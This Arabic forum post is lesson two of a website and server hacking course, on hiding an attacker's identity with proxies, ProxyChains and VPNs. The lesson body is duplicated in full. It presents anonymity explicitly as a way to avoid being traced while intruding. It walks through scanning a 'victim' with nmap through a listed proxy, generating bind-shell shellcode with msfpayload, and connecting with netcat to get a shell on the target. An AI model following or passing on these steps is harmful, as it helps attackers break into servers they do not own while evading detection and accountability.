[ الدرس الثانى ] (التخفى)
صفحة 1 من اصل 1
[ الدرس الثانى ] (التخفى)
بسم الله الرحمن الرحيم
اهلا بيكم فى ثانى درس من دروس دورة اختراق المواقع والسرفرات
فى الدرس السابق وضحنا ان من اهم الخطوات الواجب القيام بها عند الاختراق هيا جمع المعلومات لاكن فى الاول لازم نركز على قضيه مهمة وهى التخفى على الشبكة !
قبل القيام باى عملية لازم نكون متامنين على النت كويس او باعلى قدر من الامان وعلشان كدة ظهر ما يعرف باسم البروكسى "Proxy"
فى عميلة التخفى يتم استعمال ادوات وبرامج خاصة زى البروكسى مثلا للتخفى او الدخول باستخدام عنوان اخر .
درسنا النهاردة باذن الله هيكون درس خفيف جدا جدا > اوعى حد يتعود على كدة < عن التخفى وشرح لبعض ادوات البروكسى .
0-------------------0
بسم الله نبداء
فى الاول هتكلم عن اداة قوية فى عمليات التخفى وهيا اداة charlesproxy وان كان بعض الناس ممكن تختلف معى الا ان الاداة دى اثبتت فعلا قوتها وجدارتها بانها تصنف ضمن الادوات العليا فى التخفى
الاول موقع الاداة من هنا
الاداة قوية جدا وبتدعم خصائص كتيير جدا من النادر انك تلاقيهم فى اداة واحدة فهى بتدعم التخفى بالطرق الاتية
* Throttling
* Breakpoints
* SSL Proxying
* Reverse Proxy
* Port Forwarding
وكمان تحتوى على اداوت كتيير جدا مفيدة ممكن تستعملها اثناء عمليات الاختراق منها
* No Caching
* BlockC0okies
* Map Remote
* Map Local
* Rewrite
* Black List
* DNS Spoofing
* Mirror
* Auto Save
* Client Process
* Repeat
* Repeat Advanced
* Edit
* Validate
وممكن تحمل نسخة مجانية من الاداة من هنا
بعد التحميل فقط فك الضغط عن الاداة وشغلها وللعلم الاداة بتشتغل على واجهة ال GNU
عيب الاداة الوحيد انها اداة مدفوعة الثمن انما لها خواص كتيييرة
ندخل دلوقت على ثانى اداة عندنا النهاردة الى هيا اداة ال proxyknife او المعروفة باسم phc or proxy hunter customed
اداة قوية جدا من الاداوات الى بتنزل على اللينكس احيانا بيتيجى جاهزة مع بعض الصدارات وهيا من تقديم ال GNU PROJ عموما تقدروا تحملوا الاداة من هنا
عموما الاداة فعلا قديمة جدا لاكنها قوية جدا فى نفس الوقت عموما الاداة سهلة جدا جدا فى الاستخدام حملها بس انت وفك الضغط عنها وشغلها وانت تلاقى كل حاجة تمام معاك !
فاضل عندنا اخر حاجة الى هيا اداة ال
ProxyChains
سنتوقف قليلا ونشرح هذه الاداة
الكثير منا حاول يخترق مواقع لكن المشكله في IP المهاجم ,, ممكن ينصاد عن طريقه
على العموم اليوم راح نفحص بـ nmap ونستخدم ثغره عن طريق البروكسي
انتبه انتبه انتبه , عند اختيار البوركسي ,
لان ممكن يضيع عليك الثغرات, والثغرات اللي ممكن تشتغل مش مشتغله وكله بسبب البروكسي :-)
البروكسي المستخدم :
212.116.220.149:443
الاداه اللي راح نستخدمها هي proxychains
الاداه قويه واستخداماتها متنوعه ,, ببساطه هي عمل TCP tunneling عن طريق socks4/5 & http/s
فائدة الـ proxychains يجبر اي برنامج بأن يشتغل خلف بروكسي
لذلك انا راح استخدمها للاختراق والفحص :-)
الشرح فديو لكن بوضح بعض الاشياء ,
كود PHP:
nano /etc/proxychains.conf
انا وضعت البروكسي داخل الاعدادات
كود PHP:
proxychains nmap -PN -sT -sV -p 21,22,23,25,80 my-victim
انا اجبرت الـ nmap بأن يشتغل ورا بروكسي ويقوم فحص IP ضحيتي
ممكن تستخدم ادوات اخرى مثل nikto لكن ما يحتاج انك تستخدم proxychains لان
nikto له خاصيه العمل خلف بروكسي
بعد الفحص وجدنا ان بورت 21,80 مفتوحه , وراح نلاحظ ان الـ nmap اعطاني الـ بنر للبورت 21
وقدرت اطلع ثغره موجوده ,,
كود PHP:
msfpayload windows/shell_bind_tcp lport=585 C
علمت شل كود , وراح يعطيني شل على البورت 585
كود PHP:
proxychains nc -vn my-victim 585
الان حصلت شل عن طريق البروكسي
للتحميل
http://proxychains.sourceforge.net/
شرح الاداة لاخونا اخونا SiLv3r00t
والان نكمل الموضوع
لحد هنا نكون انجزنا فى موضوع البروكسى يعنى 3 اداوت لو تستعمل اداة منهم بغرض التخفى وانا شخصيا بفضل ال ProxyChains
0-------------------------0
زى ما قلنا التخفى طرقة كتيير دلوقت ندخل على طريقة تانى الى هيا ال VPN او ال Virtual Private Network
وهى طريقة جميلة جدا وفعالة للتخفى داخل شبكة وهمية والخدمة دى فى واقع كتيير جدا جدا بتقدمها اشهرها موقع http://openvpn.net
وممكن انت بنفسك تعمل VPN خاصة بيك لاكن دى بتحتاج شغل شوية
عموما احنا كل الى عاوزينة اننا نتخفى مش اكتر يبقى هنستعمل ارقام VPN خاصة ممكن نجمعها من على النت
طيب ازاى ممكن انك تستعمل رقم ال VPN ده عندك ؟
فيه طرق كتيير لاكن انا بفضل الطريقة الموجودة فى الموقع الرسمى
عموما دة الرابط الى علية الشرح من هنا
https://pr.ivacy.com/en/doc/user/setup/linux
لحد هنا انتهى درسنا النهاردة
سلامات
اهلا بيكم فى ثانى درس من دروس دورة اختراق المواقع والسرفرات
فى الدرس السابق وضحنا ان من اهم الخطوات الواجب القيام بها عند الاختراق هيا جمع المعلومات لاكن فى الاول لازم نركز على قضيه مهمة وهى التخفى على الشبكة !
قبل القيام باى عملية لازم نكون متامنين على النت كويس او باعلى قدر من الامان وعلشان كدة ظهر ما يعرف باسم البروكسى "Proxy"
فى عميلة التخفى يتم استعمال ادوات وبرامج خاصة زى البروكسى مثلا للتخفى او الدخول باستخدام عنوان اخر .
درسنا النهاردة باذن الله هيكون درس خفيف جدا جدا > اوعى حد يتعود على كدة < عن التخفى وشرح لبعض ادوات البروكسى .
0-------------------0
بسم الله نبداء
فى الاول هتكلم عن اداة قوية فى عمليات التخفى وهيا اداة charlesproxy وان كان بعض الناس ممكن تختلف معى الا ان الاداة دى اثبتت فعلا قوتها وجدارتها بانها تصنف ضمن الادوات العليا فى التخفى
الاول موقع الاداة من هنا
الاداة قوية جدا وبتدعم خصائص كتيير جدا من النادر انك تلاقيهم فى اداة واحدة فهى بتدعم التخفى بالطرق الاتية
* Throttling
* Breakpoints
* SSL Proxying
* Reverse Proxy
* Port Forwarding
وكمان تحتوى على اداوت كتيير جدا مفيدة ممكن تستعملها اثناء عمليات الاختراق منها
* No Caching
* BlockC0okies
* Map Remote
* Map Local
* Rewrite
* Black List
* DNS Spoofing
* Mirror
* Auto Save
* Client Process
* Repeat
* Repeat Advanced
* Edit
* Validate
وممكن تحمل نسخة مجانية من الاداة من هنا
بعد التحميل فقط فك الضغط عن الاداة وشغلها وللعلم الاداة بتشتغل على واجهة ال GNU
عيب الاداة الوحيد انها اداة مدفوعة الثمن انما لها خواص كتيييرة
ندخل دلوقت على ثانى اداة عندنا النهاردة الى هيا اداة ال proxyknife او المعروفة باسم phc or proxy hunter customed
اداة قوية جدا من الاداوات الى بتنزل على اللينكس احيانا بيتيجى جاهزة مع بعض الصدارات وهيا من تقديم ال GNU PROJ عموما تقدروا تحملوا الاداة من هنا
عموما الاداة فعلا قديمة جدا لاكنها قوية جدا فى نفس الوقت عموما الاداة سهلة جدا جدا فى الاستخدام حملها بس انت وفك الضغط عنها وشغلها وانت تلاقى كل حاجة تمام معاك !
فاضل عندنا اخر حاجة الى هيا اداة ال
ProxyChains
سنتوقف قليلا ونشرح هذه الاداة
الكثير منا حاول يخترق مواقع لكن المشكله في IP المهاجم ,, ممكن ينصاد عن طريقه
على العموم اليوم راح نفحص بـ nmap ونستخدم ثغره عن طريق البروكسي
انتبه انتبه انتبه , عند اختيار البوركسي ,
لان ممكن يضيع عليك الثغرات, والثغرات اللي ممكن تشتغل مش مشتغله وكله بسبب البروكسي :-)
البروكسي المستخدم :
212.116.220.149:443
الاداه اللي راح نستخدمها هي proxychains
الاداه قويه واستخداماتها متنوعه ,, ببساطه هي عمل TCP tunneling عن طريق socks4/5 & http/s
فائدة الـ proxychains يجبر اي برنامج بأن يشتغل خلف بروكسي
لذلك انا راح استخدمها للاختراق والفحص :-)
الشرح فديو لكن بوضح بعض الاشياء ,
كود PHP:
nano /etc/proxychains.conf
انا وضعت البروكسي داخل الاعدادات
كود PHP:
proxychains nmap -PN -sT -sV -p 21,22,23,25,80 my-victim
انا اجبرت الـ nmap بأن يشتغل ورا بروكسي ويقوم فحص IP ضحيتي
ممكن تستخدم ادوات اخرى مثل nikto لكن ما يحتاج انك تستخدم proxychains لان
nikto له خاصيه العمل خلف بروكسي
بعد الفحص وجدنا ان بورت 21,80 مفتوحه , وراح نلاحظ ان الـ nmap اعطاني الـ بنر للبورت 21
وقدرت اطلع ثغره موجوده ,,
كود PHP:
msfpayload windows/shell_bind_tcp lport=585 C
علمت شل كود , وراح يعطيني شل على البورت 585
كود PHP:
proxychains nc -vn my-victim 585
الان حصلت شل عن طريق البروكسي
للتحميل
http://proxychains.sourceforge.net/
شرح الاداة لاخونا اخونا SiLv3r00t
والان نكمل الموضوع
لحد هنا نكون انجزنا فى موضوع البروكسى يعنى 3 اداوت لو تستعمل اداة منهم بغرض التخفى وانا شخصيا بفضل ال ProxyChains
0-------------------------0
زى ما قلنا التخفى طرقة كتيير دلوقت ندخل على طريقة تانى الى هيا ال VPN او ال Virtual Private Network
وهى طريقة جميلة جدا وفعالة للتخفى داخل شبكة وهمية والخدمة دى فى واقع كتيير جدا جدا بتقدمها اشهرها موقع http://openvpn.net
وممكن انت بنفسك تعمل VPN خاصة بيك لاكن دى بتحتاج شغل شوية
عموما احنا كل الى عاوزينة اننا نتخفى مش اكتر يبقى هنستعمل ارقام VPN خاصة ممكن نجمعها من على النت
طيب ازاى ممكن انك تستعمل رقم ال VPN ده عندك ؟
فيه طرق كتيير لاكن انا بفضل الطريقة الموجودة فى الموقع الرسمى
عموما دة الرابط الى علية الشرح من هنا
https://pr.ivacy.com/en/doc/user/setup/linux
لحد هنا انتهى درسنا النهاردة
سلامات
مواضيع مماثلة
» [الدرس الرابع] جمع المعلومات الجزء الثانى
» الدرس الاول مقدمه
» [الدرس السادس ] اساسيات ثغرات ال php
» [الدرس السابع] اكتشاف ثغرات ال php
» [الدرس الخامس]التخمين الجزء الاول !
» الدرس الاول مقدمه
» [الدرس السادس ] اساسيات ثغرات ال php
» [الدرس السابع] اكتشاف ثغرات ال php
» [الدرس الخامس]التخمين الجزء الاول !
صفحة 1 من اصل 1
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى